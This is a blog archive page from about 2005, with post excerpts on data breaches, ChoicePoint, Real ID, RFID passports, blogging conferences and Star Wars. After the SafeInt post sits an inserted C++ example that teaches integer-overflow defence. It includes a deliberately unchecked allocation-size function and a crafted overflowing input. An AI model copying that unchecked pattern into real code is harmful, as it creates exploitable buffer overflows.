… SEC. 5. SENSE OF CONGRESS. It is the sense of Congress that the United States should… (3) deploy, at the earliest practicable date, technologies aimed at defeating state-sponsored and state-directed Internet jamming by repressive foreign governments and the intimidation and persecution by such governments of their citizens who use the Internet. Rebecca MacKinnon has […]

 

Breaches List at Privacy Rights Clearing House

The Privacy Rights Clearinghouse have been tracking breaches too. They’ve tallied 5,476,150 people affected, and have a better list than I do. I’ll continue to cover as I see things, since their list isn’t complete either.

 

I Could Kill You With These Nose Hair Clippers!

Like I said, I do like rules, rules that make sense. But this is a form of institutional insanity, and someone needs to do an intervention. When a soldier in full uniform, in the company of nothing but other soldiers, is allowed to retain the bayonet for his M-16 and his M-16, yet has to […]

 

Two On Secure Software

There’s a placeholder page at NIST for their SAMATE project (“Software Assurance Metrics and Tool Evaluation”). Interesting stuff if you wonder why it's so hard to release secure software. Also, Lauri@Schedler writes, in Making correct code look good: Reading the article I was wondering what is the point of leaving information about safe and unsafe […]

 

New Books

Two new books that may be of interest are blogger Wendy McElroy’s “National Identification Systems, Essays in Opposition” and Choicepoint CISO Richard Baich’s “Winning as a CISO.” I was going to add clever text juxtaposing the texts, but really. hmmm, I really must make this post longer, or the blog looks really bad.     […]

 

Jackson (Mich) Community College, 8,000 SSNs, Bad Policy

The Detroit Free Press reports that “Hacker may have stolen Social Security numbers from Jackson Community College:” A hacker who broke into the computer system at Jackson Community College may have accessed as many as 8,000 Social Security numbers, the college said Monday. The hacker broke into the system Wednesday. College officials are still investigating […]

 

MCI, 16,500 employees, ironically anonymous employee

Reuters is reporting “MCI: employee data was on stolen laptop:” A laptop computer containing the names and Social Security numbers of about 16,500 current and former employees of MCI Inc. was stolen last month, the Wall Street Journal reported on Monday. The computer was stolen from a car that was parked in the garage at […]

 

Emergent Bits of Security: Analyzing Binaries, Code

If you think that an application is more secure because it’s undocumented, you should read Salman A. Baset and Henning Schulzrinne’s “An Analysis of the Skype Peer-to-Peer Internet Telephony Protocol.” (Thanks, DM) Network Computing also discusses the idea, in the context of How Dangerous Was The Cisco Code Theft?. Gunnar Peterson mentions a Richard Clark […]

 

The Altered Deal

In “…And Another Thing: Those Jedi Children Were a Threat,” Gene Healy refers to the Weekly Standard review of Attack of the Clones, with its famous defense of the Empire. Make no mistake, as emperor, Palpatine is a dictator–but a relatively benign one, like Pinochet. It’s a dictatorship people can do business with. They collect […]

 

Adopt a Chinese Blog

To help folks in places like China blog, there are the obvious problems of protecting their privacy against the local authorities. But often, the audience that a blogger seeks is not the international, but the local. A blogger in China should be able to write in Chinese and share their thoughts with the people around them. […]

 

Housing Bubble?

Kip Esquire discusses “Housing Bubble: The Non-Lessons of the Past:” Today, we get some unhelpful noise from TCS Overlord James “Always Wrong” Glassman. (Remember “Dow 36,000”? The only thing dumber than the book was his half-hearted non-apology for it.) Now he’s fanning the flames of “What, us worry?” for the housing market: Since 1950, according […]

 

More on Bridge Blogging

Recently, I discussed bridge bloggers, folks who make an effort to make their posts comprehensible to those outside their country. In that post I mentioned a few information security bridge bloggers; folks who try to make our profession understandable to those outside. Something that I wanted to mention, if only it had fit into an […]

 

About Episodes 7, 8 and 9

Stuart Berman reminded me of the original plan, which was a 9-episode epic cycle for Star Wars. At some point, Lucas made the decision to allow others, the novelists, the game creators, and even the fans to define what happens after Return of the Jedi. It was a brilliant choice. The original Star Wars was […]

 

Darth Vader Doesn't Use a Keyboard

But if he did, he’d be all over the new Das Keyboard, in pure modernist black, without any decoration, like letters printed on the keys. Because sometimes you just need to signal that you’re so…ummm….cool…that you don’t need letters on the keys. (Via Daring Fireball, who points out that it’s “marketed to “übergeeks” who might […]

 

Arrests in T-Mobile, Lexis-Nexis

The Washington Post reports on Computers Seized in Data-Theft Probe: According to the teenage source, a police officer in Florida was among those who opened the infected e-mail message. Not long after his computer was infected with the keystroke-capturing virus, the officer logged on to his police department’s account at Accurint, a LexisNexis service provided […]

 

Alien Spacecraft Captured…in Orbit Around Mars

NASA’s Mars Odyssey spacecraft appears twice in the same frame in this image from the Mars Orbiter Camera aboard NASA’s Mars Global Surveyor. The camera’s successful imaging of Odyssey and of the European Space Agency’s Mars Express in April 2005 produced the first pictures of any spacecraft orbiting a foreign planet taken by another spacecraft […]

 

Can We Talk Sith Yet?

I mean, really. If you mind spoilers, you’ve seen Revenge of The Sith already. Ok, maybe not. So I’ll just throw a few comments out. Marginal Revolution discusses The public choice economics of Star Wars: A Straussian reading. I’m surprised that Tyler misses the Hayekian aspect. That is, other people’s choices are so complex that […]

 

Emergent Bits: Iranian Blogger, Economics, Security myths

Iranian blogger Mojtaba Saminejad has declared a hunger strike to protest his imprisonment. The Committee to Protect Bloggers has asked that we observe a media fast next Thursday, May 26th and not blog. There are also email addresses to write to, to ask that Mojtaba be released. Ethan Zuckerman has some fascinating comments on the […]

 

Choicepoint, Acxiom Highly Accurate

100% of the eleven participants in the study discovered errors in background check reports provided by ChoicePoint. The majority of participants found errors in even the most basic biographical information: name, social security number, address and phone number (in 67% of Acxiom reports, 73% of ChoicePoint reports). Moreover, over 40% of participants did not receive […]

 

Real ID Roundup

The fair and balanced Real ID Sucks blog (“A clearinghouse of stories about how the states will be required to spend $250 million to create standardized, machine-readable driver’s licenses, to make it easier for hackers, thieves and credit bureaus to track your every move.”) points to a San Jose Mercury News editorial, “Real ID Act […]

 

The Force Is Strong In This One.

I don’t know if it was better than A New Hope or The Empire Strikes Back. It was certainly better than I or II by a long margin. More on the politics after I’ve seen it several more times, and perhaps slept.

 

This Will Be A Day Long Remembered

It has become cliche to go on about how Greedo shooting first nearly destroyed Episode IV. For characters not to mature and grow through the course of Star Wars makes it just an action flick. But what makes Star Wars truly great is the conflict within Anakin Skywalker. And tonight’s episode is all about Anakin. […]

 

Emergent Bits of Security

(Updated shortly after posting with Eric Rescorla’s evidence presentation.) Nick Owen has a post about Net Present Value and Annual Average Loss Expectancy. If you think security is all about vulns and 0day, you probably don’t need to read this post, and your boss is going to keep rejecting your spending proposals. Carrie Kirby argues […]

 

Private to CIBC: That wasn't a challenge

Last month, I asked “What Do You Need To Do To Get Fined?” in reference to CIBC’s improper disclosure issues. Now the Ottawa Citizen is reporting that “Bank springs another privacy leak:” Fresh off fax blunders that earned it a rebuke from the federal privacy commissioner, the Canadian Imperial Bank of Commerce admitted yesterday that […]

 

Welcome to the 21st Century

Only 14 years after they were liberated by American-led forces, our ally Kuwait…gives women the vote. The Chicago Tribune reports: KUWAIT CITY — Parliament extended political rights to Kuwaiti women Monday, but religious fundamentalists who opposed women’s suffrage succeeded in attaching a clause requiring future female politicians and voters to abide by Islamic law. The […]

 

About Those Insiders, Again

Way back in August, I mentioned the CERT/CC collaboration with the Secret Service in analyzing insider threats. They’ve just released a second report, “Computer System Sabotage in Critical Infrastructure Sectors” (163k PDF). I haven’t had a chance to read it, but that’s no reason not to blog about it. Tip of the hat to Dan […]

 

Choicepoint

Knight Errant has a long post, “Tipping My Tinfoil Hat,” in which he makes mention of Choicepoint. And Consumer Affairs has a long article “USA PATRIOT Act Rewards ChoicePoint.” The IntegraSys corporation’s ID Verification software, for example, cross-checks and references 23 billion data records, including everything from credit report headers to “warm address lists” that […]

 

Emergent Privacy Bits

TechDirt points to a Cnet story by Declan McCullagh, “Kiss your old SSN goodbye:” Rep. Joe Barton, another Texas Republican who happens to chair the House Energy and Commerce Committee, said last week that he plans to “outlaw the use of Social Security numbers for any purposes other than government purposes.” … “The time has […]

 

San Jose Medical Group, 185,000, Joseph Nathaniel Harris (update)

Joseph Nathaniel Harris has been arrested and charged with the April break-in to the San Jose Medical Group, and stealing two computers with 185,000 medical records on them. The San Francisco Chronicle reports: “During Harris’ employment at San Jose Medical Group, there were several incidents of reported theft of money and medications,” according to an […]

 

Merlin Information Systems, 9,000, Lying customers

If these data brokers had any ability to deliver on their marketing, these things would never happen. Some assistant DA somewhere is going to close a data broker on false advertising, and make a name for themselves. The Daily Interlake reports “Thief nets personal information from Kalispell company:” About 9,000 people have been notified that […]

 

Hinsdale Central High School (Chicago), unknown #, 2 students

ABC7Chicago reports “Two students investigated for identity theft at high school” May 12, 2005 — Criminal charges might be filed against two students for stealing personal information at a west suburban high school. The students at Hinsdale Central are accused of hacking into the school’s computer system and obtaining Social Security numbers for students and […]

 

Michigan State Wharton Center, 40,000 CCs, Hacker

The Detroit Free Press reports “Michigan State’s Wharton Center says computer security breached:” EAST LANSING, Mich. (AP) — Michigan State University has warned more than 40,000 Wharton Center patrons that a hacker broke into a computer server involved in credit card processing for the performing arts venue. But so far, there has been no indication […]

 

Primary Colors, Author Unknown

In discussing private blogging at Blognashville, the idea of identifying bloggers by their writing style kept coming up. The example that was used (at least) twice was the “computerized” identification of the anonymous author of Primary Colors. The trouble is, the identification wasn’t done by computer. It was done by Vassar English Professor Don Foster. […]

 

Georgia DMV, employee Asif Siddiqui, "hundreds of thousands"

The Atlanta Journal Constitution reports Georgia driver’s license data put at risk (Use Bugmenot if you need a login.): Georgia Technology Authority said Friday that Asif Siddiqui, a 43-year-old Pakistani who worked for GTA, could have downloaded information on “hundreds of thousands” of drivers before he was arrested and fired late last month. … The […]

 

20Q: Emergent Databases

20Q is a website and now a handheld electronic toy that plays 20 questions. But the web site doesn’t just play 20 questions, it learns as it goes. It decides which questions are good, and which questions are bad. Alex Tabarrok writes on Marginal Revolution: I was skeptical when my wife handed me a small […]

 

The Strange Case of Syed Maswood

A year after federal agents raided his home in a terrorism investigation, Muslim businessman Syed Maswood is lucky to get on an airplane without being detained and searched. But that didn’t stop him from getting an invitation to dine with U.S. President George W. Bush. Maswood, a nuclear engineer who has not been charged with […]

 

Small Bits of Chaos: Airports, Junk Mail and Employment Law (Context-free)

Scared Monkeys asks “Could Iris Scanning be Coming To an Airport Near You?” (As if the TSA hadn’t wasted enough money on machines that don’t work, or seizing zippo lighter cameras.) Maybe the camera in their iris scanner was busted? New blog “The Dunning Letter” claims to be from a long-time junk mailer, now repentant. […]

 

Safari Enhancers

I’ve mentioned using PithHelmet. One of the most annoying remaining behaviors in Safari is that the close button closes all your tabs, and it's very close to the minimize button. D’oh! Holy usability errors without a warning, Batman! Taboo comes to the rescue, adding that warning. (While I’m blathering about my web browser, let me […]

 

The Right to Self-Treatment

The Mutualist Blog has a great article on how and why the right to choose your own medical treatments was removed, and what that means to you.

 

Choicepoint, May 12

Law.com has an article “Lawyers See Data ‘Fear Factor’ Rising:” The suits, which have been consolidated in federal court in Los Angeles and are requesting class action status, seek monetary, statutory and punitive damages, including compensation for the anxiety of waiting and wondering. They also aim to represent consumers regardless of whether their data were […]

 

Undertow of Totalism

Orcinus has a great, long post on “Undertow Of Totalism.” He starts with Two Minutes Hate, and goes from there. Read it, and then ask yourself, does your blood boil when someone mentions Ann Coulter? Michael Moore? If it’s one or the other, ask yourself if you’re being played, and stop. Pay no attention. Participate […]

 

Sogreni Bicycle Trouser Clip

Via Gizmodo, we learn of the mysterious and wondrous Sogreni Bicycle Trouser Clip. I’m not sure what a bicycle trouser clip is, but I bet you could get it spinning pretty fast to, you know, enhance a frank exchange of views with the bikes-are-just-for-Friday crowd.

 

Advances in Financial Cryptography – "First Issue"

I have a long list of issues with the academic publishing process. I’m a big fan of the Public Library of Science model. So when Ian Grigg asked me if I’d be interested in helping with his new publishing model, I was pretty excited. And now, I have an essay in the first issue: I’m […]

 

Minh: Great Vietnamese in Arlington, VA

I had lunch yesterday at Minh, at 2500 Wilson Blvd, Arlington, VA, and it was excellent. The spring rolls were crispy, tender, and not greasy. I had mint scallops as a main, and they were subtle and well prepped. The dessert, which I think was made offsite, was a hollowed out tangerine filled with tangerine […]

 

Small Bits of Chaos

Thomas Schelling is, without a doubt, one of the smartest people I’ve ever been privileged to meet. There’s a long interview with him at the Federal Reserve Bank of Richmond. (Via Marginal Revolution.) Ryan Singel has a long excerpt from Joe Lieberman. Normally, I don’t agree with much he has to say, but this is […]

 

A few Typographies of Bloggers

First, a very brief bit of terminology: A typography is a way to organize things, much like a taxonomy. Each item within a typography has clearly distinguishing characteristics, but there’s no hierarchy such as animal, vertebrates, mammals, hominids, humans. To be honest, I’m not sure if this is a typography or just some categories. But […]

 

Well, Hello Nurse!

The fine folks over at NCircle seem to have been given a directive from on high: Let there be blogs! And there were. And ncircle saw, and they were good. And someone said, let the bloggers be prolific, and behold, they were, with 18 or more posts in 5 days. Great coverage of CanSecWest, and […]

 

"It's the Medicine Talking"

Dr Jim Swan, a consultant to the drinks industry, said: “There has been much in the news about the health benefits of antioxidants in red wine. By contrast, very little has been said about malt whisky distillery science. “However, research has shown that there are even greater health benefits to people who drink single malt […]

 

$4.5 Billion and Whaddaya Get?

If you’re the Department of Homeland Security, another day older and deeper in debt. The New York Times reports on “U.S. to Spend Billions More to Alter Security Systems:” Passenger-screening equipment at airports that auditors have found is no more likely than before federal screeners took over to detect whether someone is trying to carry […]

 

On Being Fully Present

Right before Mark Glasser started his talk on protecting bloggers (which Nashville files covers really well), Mark asked to borrow my laptop (picture by Nashville Files.) [Update, May 11, Mark’s column about BlogNashville is now online, and he mentions this as his pet peeve.] We got into a discussion of me having just attempted to […]

 

Real ID, Real Problems

Bill Scannell writes: We have less than 48 hours to stop our nation from having a National ID card scheme. Do we really want to have the same ID system as Communist China? I think not. The US Senate is scheduled to vote this Tuesday on the Real ID Act. They’ve never debated the bill. […]

 

Emerging from BlogNashville

I have about 30 tabs open from Blognashville, and probably not enough time to sort through them all. Also, I really want to spend time thinking about what I heard and learned at the anonymous blogging roundtable and the protecting bloggers session (well covered by the Nashville Files.) So a link dump: The New York […]

 

Customer Relationships, Data Relationships

The computer industry is good at coming up with Orwellian names for things. The software that call center operators and others use is called a “Customer Relationship Management” system (or ‘CRM.’) The goal of such systems is to help you decide which of your customers are profitable, and give them better service. Cynics might add: […]

 

Making Money Blogging

I was unfortunately late to the Making Money Blogging session at BlogNashville. It was run by Henry Copeland of Blogads. There was a lot of discussion on driving ads, targeting ads, complaining that RSS doesn’t allow you to demographic your audience. There was some great discussion of how Major League Baseball is drawing baseball bloggers […]

 

BlogNashville was Great

I didn’t expect to have quite such a good time at BlogNashville. I mean, really. But I did. I felt really energized, and learned an awful lot from conversations. I left before the tailgating and evening dinners because I was already pretty worn down at 5PM, and it was going to be a long drive […]

 

When Was The Last Time You Linked Outside the US?

In Hoder’s session on Building a Blogosphere, Rebecca MacKinnon asked “what can we do to encourage people to link to bloggers internationally?” That’s been sort of a theme today. I think it’s challenging, because often bloggers in different places have very different orientations; that combination of cultural, educational, and training background that acts as a […]

 

Texas DMV, hundreds, mailing errors

An agency that warns Texans not to share personal information with strangers because of the risks of identity theft mistakenly mailed hundreds of driver’s licenses to the wrong people. The Texas Department of Public Safety (DPS) blamed the mixup on a malfunctioning machine that was recently installed to sort licenses for mailing. Statewide, at least […]

 

Anonymous Blogging Roundtable

I think the roundtable went well. Mark Glasser started us off with a review of the state of the world, with China having 67 bloggers in jail, Bahrain requiring bloggers to register, Cuba having a black market in email accounts with one costing $240, out of an average annual income of $1700. We talked a […]

 

Off To BlogNashville

I’m finishing my coffee, and about to hop in the car for BlogNashville, and the Anonymous Blogging Roundtable.

 

SafeNet, hundreds, paper in a briefcase

An employee hoping to get extra work done over the weekend printed out 2004 payroll information for hundreds of Safenet’s U.S. employees, snapped it into a briefcase and placed the briefcase in a car. The car was broken into over the weekend and the briefcase stolen – along with the employees’ names, bank account numbers […]

 

Corporate Welfare from TSA

USA Today reports “U.S. asks for more data on travelers” The federal government plans to begin collecting the full names and birth dates of air travelers this summer in its latest effort to screen passengers for possible links to terrorism. In a few weeks, the Transportation Security Administration will notify airlines, travel agents and online […]

 

The Coming Privacy Law

Perspectives from the gossip industry are presented by Information Week, in “Execs Testify In Favor Of National Data-Security Law:” In prepared testimony for a hearing by the House Committee on Financial Services, executives from Bank of America, ChoicePoint, and LexisNexis supported legislation patterned after California’s law requiring companies to notify customers about security breaches. ChoicePoint […]

 

Software Design Pointers

Gunnar Peterson asks “How far can software architects get using a purely rational approach to software development,” and Michael Howard points to Dave Leblanc’s “Another Look at the SafeInt Class.” If you write in C++, check out the SafeInt stuff. It’s the sort of “close off a class of vulnerabilities” approach that I love.
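The “close off a class of vulnerabilities” idea above, as an added example that is not from the page and is not Microsoft’s SafeInt library: a minimal checked-multiplication helper in the same spirit, shown beside the unchecked size computation it replaces. The allocation-size pattern, the `checked_mul` and `safe_alloc_size` names, and the hostile element count are all constructed for illustration.

```cpp
// Added example in the spirit of SafeInt (not the SafeInt class itself):
// make integer overflow in a size computation fail loudly instead of wrapping.
#include <cstddef>
#include <limits>

// Checked multiply: returns true and sets out on success, false if a*b does
// not fit in size_t. Portable form of the check; no compiler builtins needed.
inline bool checked_mul(std::size_t a, std::size_t b, std::size_t& out) {
    if (a != 0 && b > std::numeric_limits<std::size_t>::max() / a) {
        return false;   // product would exceed size_t
    }
    out = a * b;
    return true;
}

// Vulnerable pattern: element count from untrusted input times element size,
// computed with unchecked arithmetic. On overflow the result wraps to a small
// number, the buffer is far smaller than the caller assumes, and the copy that
// follows writes past its end.
inline std::size_t unchecked_alloc_size(std::size_t count, std::size_t elem) {
    return count * elem;   // wraps silently
}

// Hardened pattern: refuse the allocation unless the size computation fits.
inline bool safe_alloc_size(std::size_t count, std::size_t elem, std::size_t& out_bytes) {
    return checked_mul(count, elem, out_bytes);
}

int main() {
    // Constructed hostile count: large enough that count * 8 wraps to 0.
    const std::size_t hostile = std::numeric_limits<std::size_t>::max() / 4 + 1;
    std::size_t bytes = 0;
    bool ok = safe_alloc_size(hostile, 8, bytes);
    // unchecked_alloc_size(hostile, 8) yields 0; safe_alloc_size reports failure.
    return ok ? 1 : 0;
}
```

The point is the one the post makes: once every size computation goes through a helper that cannot wrap, the whole family of “overflow the length, then overflow the buffer” bugs disappears from that code path rather than being hunted one at a time.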

 

Copyright, Aggregators, and Readership

I’ve been thinking lately about licensing my content under a Creative Commons license, maybe non-commercial, attribution. As I think about such things, I look for scenarios where I’d be sad I’d done such a thing. While I haven’t come up with any, I’ve been noticing lately that more and more of my readership comes via […]

 

SHIFT Bicycle

Scott S. Shim, an assistant professor in the Purdue College of Liberal Arts, along with students Ryan Lightbody and Matt Grossman have won the 9th International Bicycle Design Competition in Taiwan, according to this press release. (Unfortunately, the web site isn’t going to win any design awards.) “None of us had ever designed a bicycle […]

 

Choicepoint Analyses

Today’s Wall Street Journal has a good summary article, “For Big Vendor of Personal Data, A Theft Lays Bare the Downside” (Thanks, Nick! Also, the Pittsburgh Post-Gazette has picked up the story, and made it available): The vulnerability of the company’s data and its difficulty in tracking the breach point to a paradox. ChoicePoint and […]

 

Time Warner, 600,000 employees, Iron Mountain Backup Tape

Time Warner Inc. on Monday said data on 600,000 current and former employees stored on computer back-up tapes was lost by an outside storage company, which the U.S. Secret Service is now investigating. Time Warner’s data storage company, Boston-based Iron Mountain Inc., lost the tapes during transport, Time Warner said. reports the New York Times. […]

 

Single Serving Friend: Technology For Staying In Touch

Following up on my earlier post about staying in touch, there’s a bit of technology that I’ve been meaning to build for, well, over a year now, and haven’t gotten to it. I was in Portland, Oregon for business, and someone I was speaking with said “Hey, you know Lucas Nelson is there this week?” […]

 

Perspectives on "Identity Theft"

WYFF-TV, “The Carolina Channel,” interviews two fraudsters who made money impersonating others. If you have any doubt these people are scum, one impersonated his own brother, and stole $71,000. In another, on Dave Farber’s list, victim Tom Goltz writes: Speaking as a victim of identity theft, there is absolutely nothing that an individual can do […]

 

Zabbo Blogs (again!)

I’m very excited to discover that my friend Zach Brown is blogging again. Zach was one of a group of friends who introduced me to blogs in, maybe late ’99? Early 2000? He’d been on hiatus, and I’m glad he’s back. But I realized that my excitement felt a little odd, and so I’ve been […]

 

Small Bits of Chaos all Starting with Names

Mike Solomon, of PithHelmet fame, comments on RSS spam, and promises to do something about it. (Incidentally, I’ve been wondering about NetNewswire’s cookie behavior when you load pages, but some rummaging in its files didn’t seem to turn up cookies, and I needed to go blog earn money.) Alan Chapell (whose blog is looking much […]

 

Portland Withdraws Support from Terror Task Force

Mayor Potter, a former Portland police chief, earlier this year requested that the federal government grant him, the police chief and the city attorney top-secret security clearance — the same as task force officers — so that city leaders could have access to case files and more frequent updates. Potter said he wanted the ability […]

 

Drivers License Fraud

The more trust and reliance people place in driver’s licenses, the greater the incentive to get fraudulently issued ones. FoxNews reports on “Workers Charged With Taking Payoffs for IDs ” (via JihadWatch.) “With a valid driver’s license, you establish an identity,” said Michael Garcia, assistant secretary of the Homeland Security Department. … The three Florida […]

 

Way To Debate!

Since Choicepoint demonstrated that screening is hard, they’ve been repeating the phrase “We look forward to a national debate.” But at yesterday’s annual meeting, they once again failed to engage in that debate. The LA Times has an AP story “No Answers for ChoicePoint Shareholders” (Bugmenot, because no other paper has picked up the story, […]

 

Choicepoint Annual Meeting

But today, the chairman and chief executive of Alpharetta-based ChoicePoint is likely to get a feel for his standing on a smaller stage: whether he is held in esteem by ChoicePoint shareholders. … Lauren Waits, who oversaw ChoicePoint’s charitable giving program before leaving earlier this year, describes her former boss as a visionary who also […]

 

National Legislative Roundup

In “Proposed Legislation Limiting PI Access to Data“, Private Investigator News and Information provides the National Council of Investigation and Security Services’s roundup of legislation that would affect the private investigator business. Naturally, the private investigators are up in arms; their job is about to be made a lot harder over something that wasn’t their […]

 

Hofmeyr on Legislation

1386 provides a huge incentive for companies to secure their systems, without restricting or constraining the way in which they should do so, leaving companies to choose the most effective way. This encourages innovation in defense, because should new, more effective defense strategies become available, companies are more likely to adopt them, whereas if they […]

 

Blockbuster, 65, Employee Miles N. Holloman

A former employee of a Blockbuster video store in Washington, D.C., has been indicted on charges of stealing customers’ identities, then using them to buy more than $117,000 in trips, electronics and other goods. Miles N. Holloman is charged with stealing credit card numbers, Social Security numbers and other private financial information from the application […]

 

Victory Against RFID Passports is Near

“The State Department seems to be putting down the purple Kool-Aid and looking at the serious problem this technology presents,” said Mr. Scannell, who runs an Internet site called RFIDKills.com; the first part of the name stands for radio frequency identification chips. “But no matter how much stuff you layer on the technology, it is […]

 

Small Bits: Labelling Software, People, Aaron Weisburd's Foreign Policy

Gunnar Peterson offers up a label for software that he stole from Jeff Williams. I had a good, if short, back and forth with Geoff, of Screen Discussion, in his comments, on using photographs to enhance criminal background checks, by including photos with the records of criminals, so the viewer of a report can compare. […]

 

Banks as Big Brother

“AML software will change international banking forever,” said Suheim Sheikh of SDG Software, an Indian software firm hoping to tap into the big new market. “Governments across the world will have their eyes on bank customers,” he added. “Since the software can monitor so many accounts, so many transactions, all kinds of people will be […]

 

Usability as a Security Concern

Building new technologies involves making tradeoffs. A programmer can only develop so many features in a day. These tradeoffs are particularly hard in building privacy enhancing technologies. As we work to make them more secure, we often want to show the user more information to help them make better decisions. This impacts usability. The security […]

 

What Are You Hiding, Democrat?

Time Magazine reports: The State Department has traditionally put together a list of industry representatives for these [Inter-American Telecommunication Commission] meetings, and anyone in the U.S. telecom industry who had the requisite expertise and wanted to go was generally given a slot, say past participants. Only after the start of Bush’s second term did a […]

 

Choicepoint: April 24

The Privacy Law Site posted on the Schumer-Nelson Comprehensive Privacy bill on April 13, but I just found it. The author summarizes the bill. Richard Clarke has a column in the New York Times, “You’ve Been Sold,” in which he outlines some reasonable parts of a new law. [Added shortly after first posting.] The Seattle […]

 

PithHelmet

After a recent hard drive failure on my Mac, I realized just how much I hate the web. No, that’s not really true. I don’t hate the web. I think the web is great. Advertising on the web, that drives me to distraction. And so I realized how much I appreciate Mike Solomon’s PithHelmet plug-in […]

 

Cool Music

While denying being a member of the ruling class, Asteroid points to some pretty cool music, including DJ Earworm, which helped me track down another site Asteroid mentioned: DJ Cal, at Robootlegs.com, whose “Hendrix vs Jackson – Foxy Jean Haze” is a masterpiece.

 

OSVDB Blog

Speaking of distributed innovation, the Open Source Vulnerability Database is a great project, dedicated to accumulating deep technical knowledge about computer security vulnerabilities, and making it freely available. And now it turns out, they have a blog! Mark Ward has an interesting article, “Predicting Vulnerabilities, Quotes and more.” When the patch comes out, many people […]

 

MBP On Impatience

Martin Pool, whose blog lacks a comment facility, quotes a history of Windows NT: The first two weeks of development were fairly uneventful, with the NT team using Microsoft Word to create the original design documentation… Finally, it was time to start writing some code. (I wish I’d seen this line a couple of days […]

 

Distributed Innovation

In the New York Times, Virginia Postrel writes about the work of Eric von Hippel, head of the Innovation and Entrepreneurship Group at the Sloan School of Management at MIT, who has a new (academic) book, “Democratizing Innovation.” But a lot of significant innovations do not come from people trying to figure out what customers […]

 

"£155,000 per instance of fraud"

Bruce Schneier writes: The UK government tried, and failed, to get a national ID. Now they’re adding biometrics to their passports. Financing for the Passport Office is planned to rise from £182 million a year to £415 million a year by 2008 to cope with the introduction of biometric information such as fingerprints. A Home […]

 

Small Bits: Airport Security, Tax Web Bugs

Stupid Security covers an AP story: Security at U.S. airports is no better under federal control than it was before the Sept. 11 attacks, a key House member says two government reports will conclude. None of us here [at Stupidsecurity] are surprised. The real fun begins with the second paragraph: “A lot of people will […]

 

Small Bits: Ameritrade, Tax & web privacy, revolution, medicine

It turned out someone I had dinner with last night had gotten an Ameritrade letter. According to her, Ameritrade is not offering credit monitoring service.* “Lotus, Surviving A Dark Time,” has some good analysis: Well, duh with a PR stamp. How could they have heard of any such “misuse?” If customers had any bad experiences, […]

 

CMU, 5,000+, Hacker

A hacker who tapped into business school computers at Carnegie Mellon University may have compromised sensitive personal data belonging to 5,000 to 6,000 graduate students, staff, alumni and others, officials said yesterday. … There is no evidence that any data, including Social Security and credit card numbers, have been misused, officials said. But they have […]

 

Choicepoint Earnings

ChoicePoint Inc. (NYSE: CPS), today reported first quarter total revenue growth of 19 percent compared to 2004. First quarter total revenue for 2005 was $259.3 million. … These expenses included approximately $2.0 million for communications to, and credit reports and credit monitoring services for, individuals receiving notice of the fraudulent data access and approximately $3.4 […]

 

Small Bits of Security Chaos: Airports (2), Bastille Linux adds metrics

The Department of Homeland Security Office of Inspector General has written a report on TSA security: Improvements are still needed in the screening process to ensure that dangerous prohibited items are not being carried into the sterile areas of airports, or do not enter the checked baggage system. In our report on the results of […]

 

Choicepoint, April 20

Presto Vivace reports that: During the April NCC AIIM meeting, a member of the audience asked how the IRS’ Free-File could avoid becoming another ChoicePoint, clearly a reference to recent security breaches. Everyone in the room immediately understood the reference; no explanation was needed. CBS Marketwatch reports “For now, little way to halt firms’ leaks […]

 

Trackbacks vs. Technorati?

Kip Esquire points to WILLisms, who wants to “Save the trackback.” I think I’m running about 10-to-1 spam trackbacks to real ones. It’s clearly because I talk about nothing but poker and viagra. I have to say, I love getting real trackbacks. I like it when people take what I’ve said and expand on it. […]

 

Ameritrade, 200,000 SSNs, Backup Tape

Some days I feel like I’m playing Clue…It was Mr. Mustard, in the study with the lead pipe. Ameritrade Inc. has advised 200,000 current and former customers that a computer backup tape containing their personal information has been lost, MSNBC.com has learned. The tape contained information spanning the years 2000-2003, and included both current and […]

 

Removing Excel Macros?

I have a document where I started to create a macro, then realized that some clever search and replace would work. So I stopped creating the macro. But now, the document (which I share with others) has a macro in it. Sure, its possible to open with macros disabled, but I’d like to remove the […]

 

Hasbrouck on RFID Passports

In his closing CFP keynote, Bill Scannell of RFIDKills.com asked for voice votes by the audience on whether a series of government measures including the use of secretly and remotely-readable RFID chips in passports were stupid or evil. “Both” seemed to be the predominant response. I and some others (including Ryan Singel of Wired News […]

 

DSW, IRS Security Failures

What is it with order of magnitude errors in victim counts? DSW Shoe reports 1.4 million credit cards exposed. In other news, the General Accounting Office reports [The IRS] has corrected or mitigated 32 of the 53 weaknesses that GAO reported as unresolved at the time of our prior review in 2002. However, in addition […]

 

Lebanese Democracy

The fine folks at Spirit of America are blogging their time in Lebanon. Yesterday, they point to Pulse of Freedom, where folks working towards real democracy in Lebanon are blogging. Very cool.

 

What Do You Need To Do To Get Fined?

As I covered in “Canadian Privacy Law and CIBC,” CIBC spent years faxing information to, amongst others, a West Virginia scrap yard. Today, the Privacy Commissioner released her report, and asks that they please, pretty please do better next time. See the press release, if you really want to. Via Dave Akin.

 

Housing Bubble?

Tyler Cowen asks, does DC have a housing bubble, and asks how can we justify the price rise: Housing can be lived in, most buyers have only one home, transaction costs are relatively high, and rarely are homes sold and resold in a matter of days. All those features militate against a housing bubble. Yet […]

 

Relentless Navel Gazing, in the blogger style

I’ve made a couple of CSS changes. (CSS is the Cascading Style Sheet which controls how this page looks in your browser.) Mostly making the CSS fully valid, and adding some padding around list items so they don’t scrunch together quite as much. Aren’t you thrilled? Do let me know if it looks messed up, […]

 

Sophocles

Speaker B: And the helmets are shaking their purple-dyed crests, and for the wearers of breast-plates the weavers are striking up the wise shuttle’s songs, that wakes up those who are asleep. is a pretty unexceptional line of a play, unless you happen to be a classicist, familiar enough with the works of Sophocles to […]

 

Apple Security Update 10.3.9, Analyzed

I have a confession to make. I’ve spent way too much time thinking about patching, and secure programming technique. This week’s Apple security update is interesting to me for a few reasons. Two side comments before I delve into the nitty-gritty. What’s with releasing this at 5.30PM on a Friday? If Microsoft had done that, […]

 

Polo Ralph Lauren Breach: The Rules Have Changed.

The security failure at Polo Ralph Lauren is going to be a big story. Not Choicepoint big, but big. According to ComputerWorld, in “Scope of credit card security breach expands: [An emailed] statement also noted that Polo Ralph Lauren has been working with law enforcement officials and credit card companies since fall 2004 to determine […]

 

Small Bits: Turing Test, Keynote HTML!, individual i, zipcar,

Students need volunteers: Back in the 1930s, Alan Turing proposed a “Gender Guessing Game” in which a judge, connected to two people in closed rooms with a teletype each, would attempt to guess which was a man and which was a woman. Turing then proposed extending the game into his infamous “Turing Test” where a […]

 

DNA Dragnets Not Needed

